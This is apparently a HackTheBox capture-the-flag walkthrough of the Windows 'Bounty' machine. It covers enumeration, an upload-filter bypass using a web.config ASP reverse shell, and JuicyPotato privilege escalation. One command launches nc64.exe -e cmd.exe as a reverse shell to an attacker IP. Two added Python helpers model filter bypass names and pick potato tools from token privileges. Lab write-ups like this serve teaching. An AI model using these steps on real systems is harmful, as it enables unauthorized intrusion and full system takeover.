HackTheBox - Bounty Walkthrough
Introduction
OS: Windows
Difficulty: Easy
Points: 0
Release: 16 Jun, 2018
IP: 10.10.10.93
Enumeration

Nmap scan result:

```
Nmap scan report for 10.10.10.93
Host is up (0.064s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
Only port 80 is open, and browsing the site turned up nothing useful, so we ran gobuster against it with the asp and aspx extensions (IIS 7.5 ships with Windows Server 2008 R2, so ASP.NET content is the obvious target).
```
$ gobuster dir -u http://10.10.10.93/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x asp,aspx
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.93/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              asp,aspx
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/transfer.aspx         (Status: 200) [Size: 941]
/*checkout*.aspx       (Status: 400) [Size: 11]
/*docroot*.aspx        (Status: 400) [Size: 11]
/*.aspx                (Status: 400) [Size: 11]
/http%3A%2F%2Fwww.aspx (Status: 400) [Size: 11]
/http%3A.aspx          (Status: 400) [Size: 11]
/UploadedFiles         (Status: 301) [Size: 156] [--> http://10.10.10.93/UploadedFiles/]
/q%26a.aspx            (Status: 400) [Size: 11]
/**http%3a.aspx        (Status: 400) [Size: 11]
```
Discovered paths (the 400 responses are wordlist entries containing characters IIS refuses in a URL and can be ignored):
/transfer.aspx - Secure transfer upload functionality
/UploadedFiles - Path where the uploaded files are stored
User Flag

We tried to upload an .aspx reverse shell through /transfer.aspx, but the upload was rejected by the file extension check. To bypass it we changed the extension from .aspx to .config.
Reference: https://book.hacktricks.xyz/pentesting-web/file-upload
The filter rejects .aspx but accepts .config. IIS reads an uploaded web.config as configuration for the UploadedFiles directory, and a web.config can register the .config extension with an ASP handler and carry the ASP payload itself, so requesting the uploaded file executes it even though .aspx uploads are blocked.
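To make the bypass concrete, here is an added example (not code from the box or from this walkthrough) that models the two kinds of extension check in Python: a hypothetical deny-list resembling what the box appears to use, which rejects .aspx but lets .config through, and an allow-list variant that would have stopped it. The filter logic, the extension sets and the sample filenames are assumptions constructed for illustration, not the real transfer.aspx code.

```python
import posixpath

# Server-side extensions IIS hands to a script engine. ".config" is in this set
# because an uploaded web.config can register a handler for itself and carry
# ASP code, which is the bypass used on this box.
EXECUTABLE_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".svc", ".config"}

# Assumed allow-list for a file-transfer feature that should only take documents.
ALLOWED_EXTENSIONS = {".txt", ".pdf", ".png", ".jpg", ".jpeg"}


def denylist_check(filename: str) -> bool:
    """Hypothetical model of the weak check on /transfer.aspx.

    Returns True when the upload is accepted. It only refuses names ending in
    the literal string ".aspx", so any other executable extension (and even
    ".ASPX" on a case-sensitive comparison) passes.
    """
    return not filename.endswith(".aspx")


def allowlist_check(filename: str) -> bool:
    """Hardened check: accept only a known-good extension on a plain base name.

    Returns True when the upload is accepted.
    """
    # Drop any directory component the client sent (Windows or POSIX separators).
    name = posixpath.basename(filename.replace("\\", "/"))
    # NTFS silently strips trailing dots and spaces on create, so "shell.aspx."
    # would be stored as "shell.aspx"; normalise before checking.
    name = name.rstrip(". ")
    if not name or name.lower() == "web.config":
        return False
    root, ext = posixpath.splitext(name)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return False
    # Refuse executable extensions hidden earlier in the name ("shell.aspx.txt")
    # so a mis-mapped handler cannot be reached through a double extension.
    for part in root.split("."):
        if "." + part.lower() in EXECUTABLE_EXTENSIONS:
            return False
    return True


def bypass_candidates(candidates):
    """Return the names the weak filter accepts but the hardened one rejects."""
    return [n for n in candidates if denylist_check(n) and not allowlist_check(n)]


# Constructed filenames an attacker might try against the upload form.
ATTEMPTS = ["shell.aspx", "shell.config", "web.config", "shell.ASPX",
            "shell.aspx.txt", "notes.txt", "report.PDF"]

if __name__ == "__main__":
    for name in ATTEMPTS:
        print(f"{name:16} deny-list={denylist_check(name)!s:5} allow-list={allowlist_check(name)}")
    print("slips past the weak filter:", bypass_candidates(ATTEMPTS))
```

The allow-list alone is what stops the .config trick; the extra normalisation (trailing dots, double extensions, the explicit web.config name) closes the variants that reappear once the obvious extension is blocked. Storing uploads under a server-generated name outside the web root, with script execution disabled on that directory, is the usual companion control.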
We used the .config reverse shell from https://github.com/d4t4s3c/Offensive-Reverse-Shell-Cheat-Sheet/blob/master/web.exit
Uploading that file and requesting it under /UploadedFiles/ gave us a shell as merlin:
```
meterpreter > search -f user.txt
Found 1 result...
=================

Path                              Size (bytes)  Modified (UTC)
----                              ------------  --------------
c:\Users\merlin\Desktop\user.txt  34            2023-09-13 08:33:05 -0400

meterpreter > getuid
Server username: BOUNTY\merlin
```
Got the user flag.
Root Flag

The merlin account has SeImpersonatePrivilege enabled:
```
C:\>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```
If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is present on the token, it can be abused with a potato-style attack to elevate to NT AUTHORITY\SYSTEM: the attacker coerces a SYSTEM process into authenticating to a listener they control and impersonates the resulting token. These privileges are normally assigned to service accounts (which is why IIS application pool identities such as merlin hold them), administrators and LOCAL SYSTEM. A privilege shown as Disabled is still held and can be enabled by the process, so presence matters more than state.
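An added example, not part of the original walkthrough, that parses `whoami /priv` output (the box's output above is embedded as the sample) and reports which token privileges make a potato-style escalation possible. The build-number threshold is a fact about JuicyPotato: its OXID-resolver trick stopped working in Windows 10 1809 / Server 2019 (build 17763), so the helper points at a newer tool above that; the sample text and the function names are constructed for this example.

```python
from __future__ import annotations

import re

# Constructed sample: the `whoami /priv` output shown on this page for BOUNTY\merlin.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Either of these on the token is enough for a potato-style attack to reach SYSTEM.
POTATO_PRIVILEGES = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Windows 10 1809 / Server 2019 build; JuicyPotato's DCOM/OXID trick is closed
# from this build onward, so newer hosts need PrintSpoofer or RoguePotato.
JUICY_POTATO_MAX_BUILD = 17763

# One privilege row: name, free-text description, then the State column.
_PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text: str) -> dict[str, bool]:
    """Map each privilege name to True (Enabled) or False (Disabled)."""
    privs: dict[str, bool] = {}
    for line in text.splitlines():
        m = _PRIV_LINE.match(line.rstrip())
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def potato_candidates(privs: dict[str, bool]) -> list[str]:
    """Privileges present on the token that enable a potato-style attack.

    State is deliberately ignored: a "Disabled" privilege is still held, and the
    process can switch it on with AdjustTokenPrivileges before impersonating.
    """
    return sorted(p for p in privs if p in POTATO_PRIVILEGES)


def suggest_potato(privs: dict[str, bool], build: int) -> str | None:
    """Pick a tool family for the OS build, or None if no usable privilege is held."""
    if not potato_candidates(privs):
        return None
    if build < JUICY_POTATO_MAX_BUILD:
        return "JuicyPotato"
    return "PrintSpoofer or RoguePotato"


if __name__ == "__main__":
    found = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    # Windows Server 2008 R2 SP1, the IIS 7.5 generation, reports build 7601.
    print(potato_candidates(found), suggest_potato(found, 7601))
```

Feeding the box's output through this returns `['SeImpersonatePrivilege']` and, for a Server 2008 R2 build, recommends JuicyPotato, which is exactly the path taken below.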
To escalate to SYSTEM we used JuicyPotato: https://github.com/ohpe/juicy-potato/releases. IIS 7.5 means Windows Server 2008 R2, which JuicyPotato supports; the CLSID passed with -c must be one listed for that OS version in the repository, and on Windows 10 1809 / Server 2019 and later the DCOM trick it relies on is patched and PrintSpoofer or RoguePotato is needed instead.
Command used to get the shell (nc64.exe was uploaded to merlin's Desktop beforehand; -l is the local COM listener port, -c the CLSID, -p the program to run as SYSTEM, -a its arguments, and -t * tries both CreateProcessWithTokenW and CreateProcessAsUser):

```
JuicyPotato.exe -l 1337 -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}" -p c:\windows\system32\cmd.exe -a "/c c:\users\merlin\desktop\nc64.exe -e cmd.exe 10.10.1x.xx 1234" -t *
```
After running this, the listener on port 1234 received a shell as nt authority\system:
```
C:\>hostname
bounty

C:\>whoami
nt authority\system

C:\>type users\administrator\desktop\root.txt
f95efxxxxx.......
```
Got the root flag.